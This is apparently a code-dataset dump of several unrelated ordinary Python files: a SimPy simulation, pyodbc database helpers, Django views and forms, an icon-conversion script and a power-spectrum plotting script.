start server\n            item.insert_data(\n                PipelineRecord(\n                    pipeline_id=':'.join(self.pipeline_id),\n                    queue_id=self.queue_id,\n                    package_id=item.item_id,\n                    time_stamp=self.env.now,\n                    action=\"start\", ))\n\n            yield self.env.timeout(self.delay)\n\n            # package start for process\n            item.insert_data(\n                PackageRecord(\n                    equipment_id=self.equipment_next,\n                    package_id=item.item_id,\n                    time_stamp=self.env.now,\n                    action=\"wait\", ))\n\n            # cutting path, change item next_pipeline\n            
item.pop_mark()\n\n            # pipeline end server\n            item.insert_data(\n                PipelineRecord(\n                    pipeline_id=':'.join(self.pipeline_id),\n                    queue_id=self.queue_id,\n                    package_id=item.item_id,\n                    time_stamp=self.env.now,\n                    action=\"end\", ))\n\n            self.queue.put(item)\n\n\nif __name__ == '__main__':\n    pass\n", "sub_path": "src/vehicles/items.py", "file_name": "items.py", "file_ext": "py", "file_size_in_byte": 9938, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "src.controllers.PathGenerator", "line_number": 24, "usage_type": "call"}, {"api_name": "simpy.Environment", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 31, "usage_type": "attribute"}, {"api_name": "collections.namedtuple", "line_number": 64, "usage_type": "name"}, {"api_name": "src.utils.PackageRecord", "line_number": 66, "usage_type": "argument"}, {"api_name": "logging.debug", "line_number": 69, "usage_type": "call"}, {"api_name": "src.utils.PipelineRecord", "line_number": 72, "usage_type": "argument"}, {"api_name": "logging.debug", "line_number": 75, "usage_type": "call"}, {"api_name": "simpy.Environment", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 109, "usage_type": "attribute"}, {"api_name": "simpy.Environment", "line_number": 130, "usage_type": "attribute"}, {"api_name": "collections.namedtuple", "line_number": 149, "usage_type": "name"}, {"api_name": "src.utils.TruckRecord", "line_number": 151, "usage_type": "argument"}, {"api_name": "simpy.Environment", "line_number": 167, "usage_type": "attribute"}, {"api_name": "simpy.Store", "line_number": 174, "usage_type": "call"}, {"api_name": "src.utils.PipelineRecord", "line_number": 182, "usage_type": "call"}, {"api_name": "simpy.Environment", "line_number": 197, "usage_type": "attribute"}, {"api_name": "simpy.Store", "line_number": 206, "usage_type": "call"}, {"api_name": "src.utils.PipelineRecord", "line_number": 217, "usage_type": "call"}, {"api_name": "src.utils.PackageRecord", "line_number": 230, "usage_type": "call"}, {"api_name": "src.utils.PipelineRecord", "line_number": 238, "usage_type": "call"}, {"api_name": "simpy.Environment", "line_number": 260, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 261, "usage_type": "name"}, {"api_name": "src.utils.PipelineRecord", "line_number": 289, "usage_type": "call"}, {"api_name": "src.utils.PackageRecord", "line_number": 300, "usage_type": "call"}, {"api_name": "src.utils.PipelineRecord", "line_number": 311, "usage_type": "call"}]}
+{"seq_id": "283742676", "text": "import pyodbc\n# from accounts.models import User\n\ncon = pyodbc.connect('Trusted_Connection=yes', driver = '{SQL Server}',server = 'DESKTOP-6O0KO5B\\SQLEXPRESS', database ='sanpham')\ncursor = con.cursor()\n\ndef listIdSp():\n    query = \"select id from danhsach\"\n    try:\n        cursor.execute(query)\n    except Exception:\n        return False\n    data = []\n    for row in cursor.fetchall():\n        data.append(int(row.id))\n    return data\ndef codeAnalysis():\n    listId = listIdSp()\n    data = []\n    for i in listId:\n        query = \"select COUNT(*) as code_count from dinhdanh where id_sp =\" + str(i)\n        try:\n            cursor.execute(query)\n        except Exception:\n            return False\n        for row in cursor.fetchall():\n            data.append(int(row.code_count))\n    return data\ndef getDataDanhSach(): # get info about the products that currently exist\n    query = \"select * from danhsach\"\n    try:\n        cursor.execute(query)\n    except Exception:\n        return False\n    data = 
[]\n    for row in cursor.fetchall():\n        data.append(row)\n    return data\n# from ..app.utils import getDataDanhSach\n# data = getDataDanhSach()\n\n# for i in data:\n#     print('\"' + i[1] + '\"')\ndef history():\n    query = \"select CAST(ngay_sinh as DATE),DATEPART(hour,ngay_sinh) as gio,sum(num) as sum_day from lichsu \" \\\n            \"group by CAST(ngay_sinh as date) ,DATEPART(hour,ngay_sinh) \" \\\n            \"order by CAST(ngay_sinh as date),DATEPART(hour,ngay_sinh)\"\n    try:\n        cursor.execute(query)\n    except Exception:\n        return False\n    data = []\n    for row in cursor.fetchall():\n        data.append(row)\n    return data\n# print(history())", "sub_path": "analysis/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1685, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pyodbc.connect", "line_number": 4, "usage_type": "call"}]}
+{"seq_id": "423421672", "text": "# Django modules\nfrom django.shortcuts import render_to_response\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.template import RequestContext\nfrom django.db import transaction\nfrom django.views.decorators.csrf import csrf_protect\n\n# From Python\n\n# Our modules\nfrom infra.forms.message_type import SearchMessageQueueForm, ActionMessageQueueFormSet\nfrom infra.models import MessageQueue\nfrom infra.custom.build_query_filter import build_query_filter\nimport infra.custom.custom_json as custom_json\n\n# This program's constants\n\n# Decorators to ensure that user is logged in and\n# is a staff member\n@login_required\n@staff_member_required\n@csrf_protect\n# Have to fix all exception before enabling commit manually.\n# When turned on, will hide any exception behind its TransactionManagementError\n# so remark off when debugging...\n@transaction.commit_manually\ndef my_messages(request, delivery_method='Q'):\n    \"\"\"\n\n    Display Messages for logged in User and allow\n    action on message.\n\n    Delivery Method : A=Alerts, Q=Queued Messages\n\n    queryset_criteria : Because we want to save previous query\n    criteria as json in formset so that we can redisplay the rows\n    which were updated. However filter() args cannot simply be\n    treated like a dict, so we borrowed code from django snippets\n    that allow us to express the query criteria as a list which\n    can be converted to Q objects. 
\n    See infra/custom/build_query_filter.py\n\n    Uses template infra/my_messages.html\n\n    \"\"\"\n    # Initialise Error Messages\n    error_messages = []\n\n    # POST happens when the user enters data and presses the submit button\n    if request.method == 'POST':\n\n        search_form = SearchMessageQueueForm(request.POST)\n        # User pressed search button \n        if request.POST.has_key('search'):\n            if search_form.is_valid():\n                # Reset queryset criteria; we AND together all the filters \n                queryset_criteria = ['and', ['exact', 'recipient', request.user.id]]\n\n                if search_form.cleaned_data['delivery_method']:\n                    queryset_criteria.append(['exact', 'message_type__delivery_method', search_form.cleaned_data['delivery_method']])\n                else:\n                    queryset_criteria.append(['exact', 'message_type__delivery_method', delivery_method])\n                if search_form.cleaned_data['required_action']:\n                    queryset_criteria.append(['exact', 'message_type__required_action', search_form.cleaned_data['required_action']])\n                if search_form.cleaned_data['external_delivery_method']:\n                    queryset_criteria.append(['exact', 'message_type__external_delivery_method', search_form.cleaned_data['external_delivery_method']])\n                if search_form.cleaned_data['sender_name']:\n                    queryset_criteria.append(['exact', 'sender_name', search_form.cleaned_data['sender_name']])\n                if search_form.cleaned_data['sent_on']:\n                    queryset_criteria.append(['gte', 'sent_on', search_form.cleaned_data['sent_on']])\n                if search_form.cleaned_data.has_key('acted_flag'):\n                    queryset_criteria.append(['isnull', 'action_on', (not search_form.cleaned_data['acted_flag'])])\n\n                my_messages = MessageQueue.objects.filter(build_query_filter(queryset_criteria))\n                message_formset = ActionMessageQueueFormSet(queryset=my_messages)\n        # User pressed post to save updates to messages\n        elif request.POST.has_key('post'):\n            # Retrieve previous queryset criteria\n            queryset_criteria = custom_json.loads(request.POST.get('queryset_criteria'))\n            # Instantiate formset from Post request and with previous queryset\n            my_messages = MessageQueue.objects.filter(build_query_filter(queryset_criteria))\n            message_formset = ActionMessageQueueFormSet(request.POST, queryset=my_messages)\n            # Save updates to messages\n            if message_formset.is_valid():\n                saved_messages = message_formset.save()\n                transaction.commit()\n                # Inform user how many saved\n                error_messages.append(_(\"%d Message(s) has been updated\") % (len(saved_messages),))\n                # Reset formset (to show updated messages)\n                message_formset = ActionMessageQueueFormSet(queryset=my_messages)\n            # else redisplay formset with errors\n\n    else:\n        # GET Method (1st time this page is called), default our hidden entity\n        search_form = SearchMessageQueueForm()\n        # Default is show unread messages only\n        queryset_criteria = ['and', ['exact', 'recipient', request.user.id], \n                             ['exact', 'message_type__delivery_method', delivery_method],\n                             ['isnull', 'action_on', True]]\n\n        my_messages = MessageQueue.objects.filter(build_query_filter(queryset_criteria))\n        message_formset = ActionMessageQueueFormSet(queryset=my_messages)\n\n    # Note: Paginator does not work with formsets\n\n    # Even reads need to be committed\n    transaction.commit()\n    # Display page to user. 
We have to commit again, possibly because render to response will \n # dirty trx buffer again\n with transaction.commit_on_success(): return render_to_response('infra/my_messages.html', {'search_form': search_form, \n 'message_formset': message_formset, 'queryset_criteria': custom_json.dumps(queryset_criteria),\n 'error_messages': error_messages, 'media': search_form.media,\n }, context_instance=RequestContext(request))\n", "sub_path": "infra/views/my_messages.py", "file_name": "my_messages.py", "file_ext": "py", "file_size_in_byte": 5725, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "infra.forms.message_type.SearchMessageQueueForm", "line_number": 54, "usage_type": "call"}, {"api_name": "infra.models.MessageQueue.objects.filter", "line_number": 76, "usage_type": "call"}, {"api_name": "infra.models.MessageQueue.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "infra.models.MessageQueue", "line_number": 76, "usage_type": "name"}, {"api_name": "infra.custom.build_query_filter.build_query_filter", "line_number": 76, "usage_type": "call"}, {"api_name": "infra.forms.message_type.ActionMessageQueueFormSet", "line_number": 77, "usage_type": "call"}, {"api_name": "infra.custom.custom_json.loads", "line_number": 81, "usage_type": "call"}, {"api_name": "infra.custom.custom_json", "line_number": 81, "usage_type": "name"}, {"api_name": "infra.models.MessageQueue.objects.filter", "line_number": 83, "usage_type": "call"}, {"api_name": "infra.models.MessageQueue.objects", "line_number": 83, "usage_type": "attribute"}, {"api_name": "infra.models.MessageQueue", "line_number": 83, "usage_type": "name"}, {"api_name": "infra.custom.build_query_filter.build_query_filter", "line_number": 83, "usage_type": "call"}, {"api_name": "infra.forms.message_type.ActionMessageQueueFormSet", "line_number": 84, "usage_type": "call"}, {"api_name": "django.db.transaction.commit", "line_number": 88, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 88, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 90, "usage_type": "call"}, {"api_name": "infra.forms.message_type.ActionMessageQueueFormSet", "line_number": 92, "usage_type": "call"}, {"api_name": "infra.forms.message_type.SearchMessageQueueForm", "line_number": 97, "usage_type": "call"}, {"api_name": "infra.models.MessageQueue.objects.filter", "line_number": 103, "usage_type": "call"}, {"api_name": "infra.models.MessageQueue.objects", "line_number": 103, "usage_type": "attribute"}, {"api_name": "infra.models.MessageQueue", "line_number": 103, "usage_type": "name"}, {"api_name": "infra.custom.build_query_filter.build_query_filter", "line_number": 103, "usage_type": "call"}, {"api_name": "infra.forms.message_type.ActionMessageQueueFormSet", "line_number": 104, "usage_type": "call"}, {"api_name": "django.db.transaction.commit", "line_number": 109, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 109, "usage_type": "name"}, {"api_name": "django.db.transaction.commit_on_success", "line_number": 112, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 112, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 112, "usage_type": "call"}, {"api_name": "infra.custom.custom_json.dumps", "line_number": 113, "usage_type": "call"}, {"api_name": "infra.custom.custom_json", "line_number": 113, "usage_type": "name"}, {"api_name": 
"django.template.RequestContext", "line_number": 115, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 22, "usage_type": "name"}, {"api_name": "django.contrib.admin.views.decorators.staff_member_required", "line_number": 23, "usage_type": "name"}, {"api_name": "django.views.decorators.csrf.csrf_protect", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.transaction.commit_manually", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.db.transaction", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "104888412", "text": "import shutil, os, sys\nfrom fenx.resources import icon_process\nfrom PyQt5.QtWidgets import QApplication\napp = QApplication([])\n\npng = os.path.join(os.path.dirname(icon_process.__file__), 'icons', 'fenx.png')\npng_i = os.path.join(os.path.dirname(icon_process.__file__), 'icons', 'fenx_install.png')\n\nif not os.path.exists(png):\n sys.exit(1)\n \nicon_process.convert_to_ico(png_i)\nficon = icon_process.convert_to_ico(png)\n\ntray = os.path.join(os.path.dirname(png), 'tray.png')\ntrayw = os.path.join(os.path.dirname(png), 'tray_wait.png')\nshutil.copy2(png, tray)\nicon_process.color_correct_hsv(png, trayw, v=0.5)\n", "sub_path": "fenx_icon.py", "file_name": "fenx_icon.py", "file_ext": "py", "file_size_in_byte": 610, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "fenx.resources.icon_process.__file__", "line_number": 6, "usage_type": "attribute"}, {"api_name": "fenx.resources.icon_process", "line_number": 6, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "fenx.resources.icon_process.__file__", "line_number": 7, "usage_type": "attribute"}, {"api_name": "fenx.resources.icon_process", "line_number": 7, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 10, "usage_type": "call"}, {"api_name": "fenx.resources.icon_process.convert_to_ico", "line_number": 12, "usage_type": "call"}, {"api_name": "fenx.resources.icon_process", "line_number": 12, "usage_type": "name"}, {"api_name": "fenx.resources.icon_process.convert_to_ico", "line_number": 13, "usage_type": "call"}, {"api_name": "fenx.resources.icon_process", "line_number": 13, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 17, "usage_type": "call"}, {"api_name": "fenx.resources.icon_process.color_correct_hsv", "line_number": 18, "usage_type": "call"}, {"api_name": 
"fenx.resources.icon_process", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "592030549", "text": "# Modules\nimport datetime as dt\nfrom typing import List\nimport matt\n# ------------------------------------------------------------------------------------------------------------------------------------------------------\n# User Input\narguments = {\n \"BranchIds\" : {\"type\" : List[int], \"names\" : [\"i\", \"bids\", \"branchids\"], \"default\" : [], \"info\" : \"List of branches to assign surveys for.\"},\n \"ClosureDate\" : {\"type\" : dt.date, \"names\" : [\"c\", \"cl\", \"closuredate\"], \"default\" : dt.date.today(), \"info\" : \"Date at which the branches will close.\"},\n \"Logging\" : {\"type\" : bool, \"names\" : [\"l\", \"log\", \"logging\"], \"default\" : True, \"info\" : R\"Log the SQL statments executed by this script in 'E:\\Oneoffs'.\"},\n \"Autocommit\" : {\"type\" : bool, \"names\" : [\"a\", \"ac\", \"autocommit\"], \"default\" : False, \"info\" : \"Automatically commit all transactions in this script instead of requesting user permission.\"}\n}\nargs = matt.args.IOHandler(arguments=arguments, program_desc=\"Script to make new entries in the branch closures table.\")\nbranch_ids, closure_date, logging, autocommit = args[\"BranchIds\"], args[\"ClosureDate\"], args[\"Logging\"], args[\"Autocommit\"]\n# ------------------------------------------------------------------------------------------------------------------------------------------------------\n# Setup\nalch = matt.sql.Alchemy(schemas=[\"base\"])\ns, tables = alch.session, alch.reflection.classes\nClosures = tables.branch_closures\nalch.initialize_log(\"BranchClosures\", logdir=matt.lbg.one_offs_path, active=logging)\n# ------------------------------------------------------------------------------------------------------------------------------------------------------\n# Execution\nextant = [rec[0] for rec in s.query(Closures.branch_id).filter(Closures.branch_id.in_(branch_ids)).all()]\nif extant:\n raise ValueError(f\"Duplicate branch ids {[branch for branch in branch_ids if branch in extant]} not allowed.\")\n\nnew = [Closures(branch_id=branch, closure_date=closure_date, processed=None, created_date=alch.func.now(), last_modified_date=alch.func.now()) for branch in branch_ids]\nalch.insert_statement_with_safeguards(new, select_from=Closures, autocommit=autocommit)\n", "sub_path": "Scripts/Ongoing/NewBranchClosures.py", "file_name": "NewBranchClosures.py", "file_ext": "py", "file_size_in_byte": 2240, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "typing.List", "line_number": 8, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 9, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 9, "usage_type": "call"}, {"api_name": "matt.args.IOHandler", "line_number": 13, "usage_type": "call"}, {"api_name": "matt.args", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matt.sql.Alchemy", "line_number": 17, "usage_type": "call"}, {"api_name": "matt.sql", "line_number": 17, "usage_type": "attribute"}, {"api_name": "matt.lbg", "line_number": 20, "usage_type": "attribute"}]} +{"seq_id": "63687495", "text": "from django.views.generic.edit import CreateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\nfrom .base import BitLinkBaseView\n\n\nclass BitLinkCreateView(BitLinkBaseView, LoginRequiredMixin, CreateView):\n template_name = 'create.html'\n fields = [\n 'original_url',\n 
]\n success_url = '/mypage/'\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n return super(BitLinkCreateView, self).form_valid(form)\n\n def get_context_data(self, **kwargs):\n context = super(BitLinkCreateView, self).get_context_data(**kwargs)\n context['site_name'] = 'Create BitLink'\n return context\n", "sub_path": "wpsblog/bitly/views/create.py", "file_name": "create.py", "file_ext": "py", "file_size_in_byte": 659, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "base.BitLinkBaseView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "296224955", "text": "from django import forms\nfrom .models import Club\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\n\n\n# Form for adding a new Club\nclass ClubForm(forms.Form):\n\tname = forms.CharField(label='Club Name', max_length=64,required=True)\n\twebsite = forms.CharField(label='Website', max_length=128,required=False)\n\n\tclass Meta:\n\t\tmodel = Club\n\t\tfields = {'name' , 'email' , 'website' , 'meeting_times' , 'president' , 'treasurer' , 'icc_rep'}\n\n\tdef save(self, commit=True):\n\t\tclub = Club()\n\t\tclub.name = self.cleaned_data['name']\n\t\tclub.website = self.cleaned_data['website']\n\n\t\tif commit:\n\t\t\tclub.save()\n\n\t\treturn club\n\t\n# Form for editing the a Club that already exists\nclass EditClubForm(forms.Form):\n\tid = forms.IntegerField(required=True)\n\tname = forms.CharField(label='Club Name', max_length=64,required=True)\n\twebsite = forms.URLField(label='Website', max_length=128,required=False)\n\temail = forms.EmailField(label='Email', max_length=256,required=False)\n\tmeeting_times = forms.CharField(label='Meeting Times', max_length=256,required=False)\n\n\tclass Meta:\n\t\tmodel = Club\n\t\tfields = {'id', 'name' , 'email' , 'website' , 'meeting_times'}\n\n\tdef save(self, commit=True, user_id = None):\n\t\tclub = Club.objects.filter(id=self.cleaned_data['id'])\n\t\tif len(club) == 1:\n\t\t\tclub = club[0]\n\t\t# check if the person updating the club actually has access\n\t\tif user_id in {club.president, club.treasurer, club.icc_rep}:\n\t\t\tclub.name = self.cleaned_data['name']\n\t\t\tclub.website = self.cleaned_data['website']\n\t\t\tclub.email = self.cleaned_data['email']\n\t\t\tclub.meeting_times = self.cleaned_data['meeting_times']\n\t\n\t\t\tif commit:\n\t\t\t\tclub.save()\n\t\telse:\n\t\t\traise ValidationError(message = \"User ID \" + str(user_id) + \" doesn't have permission to edit Club ID \" + str(club.id) )\n\n\t\treturn club", "sub_path": "projectx/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.forms.Form", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 8, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 10, "usage_type": "name"}, {"api_name": "models.Club", "line_number": 13, 
"usage_type": "name"}, {"api_name": "models.Club", "line_number": 17, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "django.forms.IntegerField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 28, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.URLField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 30, "usage_type": "name"}, {"api_name": "django.forms.EmailField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 31, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 32, "usage_type": "name"}, {"api_name": "models.Club", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Club.objects.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Club.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "models.Club", "line_number": 39, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "315408067", "text": "## plot_binned_radialPSD.py\r\n##=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n## DTM 10/12/2012\r\n##=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n#import modules\r\nimport sys\r\nimport numpy as np, matplotlib.pyplot as plt\r\nfrom matplotlib import rcParams\r\n\r\ndef make_plots(file_id):\r\n \r\n\r\n # Set up fonts for plots \r\n rcParams['font.family'] = 'sans-serif'\r\n rcParams['font.sans-serif'] = ['arial']\r\n rcParams['font.size'] = 8\r\n rcParams['legend.numpoints'] = 1\r\n OutputFigureFormat='png'\r\n #########################\r\n # #\r\n # READ IN THE DATA #\r\n # #\r\n #########################\r\n\r\n # open file \r\n #FileName1 = 'test_binned_radialPSD.txt'\r\n FileName1 = file_id+'_binned_radialPSD.txt'\r\n #OutputFigureName = 'radial_PSD'\r\n #OutputFigureFormat = 'eps'\r\n f1 = open(FileName1,'r') # open file\r\n lines = f1.readlines() # read in the data\r\n no_lines = len(lines) # get the number of lines (=number of data)\r\n # data variables\r\n # data variables\r\n radial_frequency_binned = np.zeros(no_lines-1) \r\n PSD_binned = np.zeros(no_lines-1) \r\n wavelength_binned = np.zeros(no_lines-1)\r\n R_sq = np.zeros(no_lines-1)\r\n Beta = np.zeros(no_lines-1) \r\n Background = np.zeros(no_lines-1) \r\n CI95 = np.zeros(no_lines-1) \r\n CI99 = np.zeros(no_lines-1) \r\n \r\n for i in range (1,no_lines-1):\r\n line = lines[i].strip().split(\" \")\r\n #print line\r\n radial_frequency_binned[i] = float(line[0])\r\n wavelength_binned[i] = float(line[1]) \r\n PSD_binned[i] = float(line[2])\r\n R_sq[i] = float(line[3])\r\n Beta[i] = float(line[4])\r\n Background[i] = float(line[5])\r\n CI95[i] = float(line[6])\r\n CI99[i] = float(line[7])\r\n f1.close()\r\n \r\n #FileName2 = 'test_radialPSD.txt'\r\n FileName2 = file_id+'_radialPSD.txt'\r\n f2 = open(FileName2,'r') # open file\r\n lines = f2.readlines() # read in the data\r\n no_lines = len(lines) # get the number of lines (=number of data)\r\n # data variables\r\n #radial_frequency = np.zeros(no_lines-1) \r\n #wavelength = 
np.zeros(no_lines-1)\r\n #amplitude = np.zeros(no_lines-1) \r\n #norm_amplitude = np.zeros(no_lines-1) \r\n rf = []\r\n wl = []\r\n amp = []\r\n na = []\r\n \r\n for i in range (1,no_lines-1):\r\n line = lines[i].strip().split(\" \")\r\n #print line\r\n #if( float(line[1]) > 100):\r\n rf.append(float(line[0]))\r\n wl.append(float(line[1]))\r\n amp.append(float(line[2]))\r\n na.append(float(line[3]))\r\n \r\n f2.close()\r\n \r\n radial_frequency = np.asarray(rf)\r\n wavelength = np.asarray(wl)\r\n amplitude = np.asarray(amp)\r\n norm_amplitude = np.asarray(na)\r\n \r\n\r\n\r\n rollover_freq = radial_frequency_binned[Beta==max(Beta)] \r\n #########################\r\n # #\r\n # MAKE PSD plot #\r\n # #\r\n ######################### \r\n \r\n plt.figure(1, facecolor='white',figsize=[4,8])\r\n ax1 = plt.subplot(3,1,1)\r\n ax1.axvline(x=rollover_freq,linestyle='dashed',color='black') \r\n #ax1.vlines(rollover_freq,10**-9,10**2,linestyles='dashed')\r\n ax1.plot(radial_frequency, amplitude,\".\", alpha = 0.10, markeredgewidth = 0, color = '0.0')\r\n ax1.plot(radial_frequency_binned, PSD_binned,\"o\",color='white', markeredgecolor=\"red\")\r\n ax1.plot(radial_frequency_binned, Background,\"-b\")\r\n ax1.set_yscale('log')\r\n ax1.set_xscale('log')\r\n ax1.set_xlim(xmax=0.3)\r\n ax1.grid(True)\r\n xmin,xmax = ax1.get_xlim() \r\n ax1.annotate('a', xy=(0.95,0.85), xycoords='axes fraction',backgroundcolor='white',horizontalalignment='right', verticalalignment='bottom', fontsize=rcParams['font.size']+2) \r\n ax1.set_ylabel('DFT mean-squared amplitude (m$^2$)')\r\n \r\n ax2 = plt.subplot(3,1,2)\r\n ax2.axvline(x=rollover_freq,linestyle='dashed',color='black') \r\n series1 = ax2.plot(radial_frequency_binned[Beta != -9999], R_sq[Beta != -9999],\"o\", color=\"blue\", label = 'R$^2$')\r\n ax2.set_ylabel('R$^2$')\r\n ax2.set_xscale('log')\r\n ax2.set_xlim(xmax=1)\r\n ax2.set_ylim(ymin=0.9*np.min(R_sq[Beta > 0]),ymax=1)\r\n ax2.xaxis.grid(True)\r\n ax2.annotate('b', xy=(0.95,0.85), xycoords='axes fraction',backgroundcolor='white',horizontalalignment='right', verticalalignment='bottom', fontsize=rcParams['font.size']+2) \r\n \r\n ax3 = plt.subplot(3,1,2).twinx()\r\n series2 = ax3.plot(radial_frequency_binned[Beta != -9999], Beta[Beta != -9999],\"d\",color='white', markeredgecolor=\"red\", label = 'Beta')\r\n ax3.set_ylabel('Beta')\r\n ax3.set_xscale('log')\r\n ax3.set_ylim(ymin=0.8*np.min(Beta[Beta > 0]),ymax=1.25*np.max(Beta[Beta > 0]))\r\n ax3.set_xlim(xmin,xmax)\r\n series = series1+series2\r\n labels = [l.get_label() for l in series]\r\n ax2.legend(series, labels, loc=3)\r\n \r\n \r\n ax4 = plt.subplot(3,1,3)\r\n ax4.axhspan(0, np.max(CI99), alpha = 0.2) \r\n ax4.axhspan(0, np.max(CI95), alpha = 0.2) \r\n ax4.plot(radial_frequency, norm_amplitude,\".\", alpha = 0.75, markeredgewidth = 0, color = '0.0')\r\n ax4.set_ylabel('Normalised Power')\r\n ax4.set_xlabel('Radial Frequency (m$^{-1}$)') \r\n ax4.set_xscale('log')\r\n ax4.set_xlim(xmin,xmax) \r\n ax4.grid(True)\r\n ax4.annotate('c', xy=(0.95,0.85), xycoords='axes fraction',backgroundcolor='white',horizontalalignment='right', verticalalignment='bottom', fontsize=rcParams['font.size']+2) \r\n plt.tight_layout()\r\n plt.subplots_adjust(right=0.85)\r\n #plt.show()\r\n plt.savefig(file_id+'_spectrum.' 
+ OutputFigureFormat, format=OutputFigureFormat)\r\n \r\nif __name__ == \"__main__\":\r\n #file_id = \"/home/s1143956/LSD_Datastore/LH_paper_dems/gm_30m_dem\"\r\n make_plots(sys.argv[1])", "sub_path": "SpectralPlotting/plot_spectra_Perron_Chile.py", "file_name": "plot_spectra_Perron_Chile.py", "file_ext": "py", "file_size_in_byte": 5961, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.rcParams", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.rcParams", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.rcParams", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.rcParams", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": 